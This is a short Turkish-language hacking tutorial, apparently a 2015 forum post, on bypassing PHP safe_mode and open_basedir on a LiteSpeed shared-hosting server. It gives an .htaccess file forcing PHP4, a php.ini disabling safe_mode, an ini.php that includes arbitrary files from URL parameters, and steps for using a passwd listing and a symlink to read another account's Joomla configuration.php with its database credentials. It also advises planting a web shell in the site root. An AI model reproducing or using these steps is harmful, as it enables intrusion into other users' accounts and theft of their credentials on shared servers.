LiteSpeed server bypass komutları

Ekleyen: Admin Tarih: Cuma, Mayıs 15, 2015

.htaccess

Kod:

<Files *.php> 
ForceType application/x-httpd-php4 
</Files>

php.ini

Kod:

safe_mode = OFF

ini.php

Kod:

<? 
echo ini_get("safe_mode"); 
echo ini_get("open_basedir"); 
include($_GET["file"]); 
ini_restore("safe_mode"); 
ini_restore("open_basedir"); 
echo ini_get("safe_mode"); 
echo ini_get("open_basedir"); 
include($_GET["ss"]); 
?>

Bu Dosyaları serverde açtığımız dizine upload ediyoruz örneğin ben Pose diye bir dizin açtım
oraya yükledim farzedelim yapmamız gerekn şu çektiğimiz pwd dosyasından geçmek istediğimiz dizini bulmak örneğin


/home/poseidon/public_html/ dizininde olduğumuzu farz edeli fakat elimzdeki pwd dosyasında şöyle bir başka dizin bulunmakta


/home/bk:/usr/local/cpanel/bin/noshell
/home/bk2:/usr/local/cpanel/bin/noshell
/home/bk3:/usr/local/cpanel/bin/noshell
/home/bk4:/usr/local/cpanel/bin/noshell
/home/bk5:/usr/local/cpanel/bin/noshell
/home/bk6:/usr/local/cpanel/bin/noshell




hepsini farklı olarak düşünü bizim yapmamız gereken geçmek istediğimiz dizini yazmak örneğin ben bu dizinden /home/bk/public_html/
bir başka dizin olan /home/bk:/usr/local/cpanel/bin/noshell dizinine geçmek istiyorum ve oradaki configi alıp yazdırmak istiyorum dikkat etmemiz gerekn husus sistemdir joomlamı wordpressmi


eğer joomla ise


ln -s //home/bk/public_html/configration.php pose.shtml


diyip enterliyoruz eğer configi çekerse ana dizinde şöyle bir sayfa oluşturacak pose.shtml diye tıkladığımızda config bilgisini karşımızda veya source kısmında olduğunu göreceğiz bunu ctrl+u yaparak görebiliriz


NOT:Sunucu php4'e düşürülürken shell'i kaybedebilirsiniz bu yüzden her ihtimale karşı anadizine bir shell upload edin sıkıntı olmasın